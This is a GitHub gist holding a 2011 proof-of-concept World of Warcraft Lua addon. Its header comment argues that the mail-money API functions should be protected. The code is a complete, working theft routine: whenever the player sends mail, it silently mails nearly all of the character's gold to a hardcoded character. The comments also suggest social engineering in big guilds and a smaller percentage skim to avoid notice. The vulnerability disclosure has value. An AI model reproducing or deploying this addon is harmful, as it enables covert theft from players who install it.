Last active
January 1, 2016 15:09
-
-
Save zined/8162295 to your computer and use it in GitHub Desktop.
from 2011: "PoC: Call of PROTECTED functions from unsecure LUA execution path"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
----------------------------------------------------------------------------------------- | |
-- small proof of concept which hooks into MAIL_SUCCESS, and sends the total amount of | |
-- money on the char to some other char. | |
-- | |
-- with a little social engineering in some big guilds and some "not so aggressive" style | |
-- of "how much money do we want to send" algorithm :) like "always send 1% of the | |
-- char's total money, with a cap of 100g or something like that" this could be heavily | |
-- abused... | |
-- | |
-- functions used: | |
-- | |
-- SetSendMailMoney(..) | |
-- SendMail(..) | |
-- | |
-- imho SetSendMailMoney() should be PROTECTED, i would event think about moving both | |
-- functions to PROTECTED, as sending a mail is imo definitely an action a user want's | |
-- to trigger for himself... :) | |
-- | |
-- this has been tested on some chars from my own guild, but we had an ongoing teamspeak | |
-- session, so immediately after sending gold, i informed them of what just happened | |
-- and send the gold back, so this is still private. | |
----------------------------------------------------------------------------------------- | |
-- we don't want to let "MAIL_SUCCESS" triggered by our own mail trigger our logic again | |
SentFromAddon = false | |
-- recipient's charName | |
FooRecipient = "Wurstkoffer" | |
-- frame to capture event/s with | |
local FooFrame = CreateFrame("frame") | |
FooFrame:RegisterEvent("MAIL_SUCCESS") | |
FooFrame:SetScript("OnEvent", function (self, event) | |
-- on MAIL_SUCCESS .. | |
if event == "MAIL_SUCCESS" then | |
-- .. if if wasn't ourselve who triggered the event .. | |
if SentFromAddon == false then | |
SentFromAddon = true | |
-- .. we send 100% of the char's money minus the cost for sending mail .. | |
local SendAmount = GetMoney() - 300 | |
SetSendMailMoney(SendAmount) | |
-- .. to FooRecipient ... | |
SendMail(FooRecipient, "Money from " .. UnitName("player") .. " ( " .. SendAmount / 10000 .. " )", "body") | |
print("Sent " .. SendAmount .. " copper to " .. FooRecipient) | |
else | |
SentFromAddon = false | |
end | |
end | |
end) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment